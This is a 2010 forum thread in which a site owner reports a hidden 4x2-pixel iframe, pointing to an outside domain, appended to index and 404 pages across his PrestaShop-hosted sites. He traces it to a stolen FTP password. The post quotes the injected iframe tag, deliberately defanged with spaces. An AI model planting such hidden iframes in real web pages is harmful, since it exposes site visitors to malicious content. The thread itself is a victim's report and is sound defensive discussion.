MrBaseball34 Posted July 23, 2010 Share Posted July 23, 2010 Getting this added to the bottom of several files, index.php, 404.shtml, 404.php, !index.html and causing problems.How is this happening and what can I do about it?We don't run a CMS, we run Prestashop, however, they are both older versions.We did, however, get this on one site that did not have Prestashop installed, too.Any ideas?{I put spaces in the link so people wouldn't get the warnings) <iframe src="http : // eiueuiuewi.com /7JF8963DH53SJ4/" width="4" height="2"></iframe> Link to comment Share on other sites More sharing options...
MrBaseball34 Posted July 24, 2010 Author Share Posted July 24, 2010 After looking at our FTP logs it would appear our FTP password has been compromised. After looking at logins, and noticing an IP address in Moldova I searched the logs for that IP address, and found that they had downloaded and then uploaded the files in question on all our sites hosted on our host's server.I have banned the IP block so maybe that will help? Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now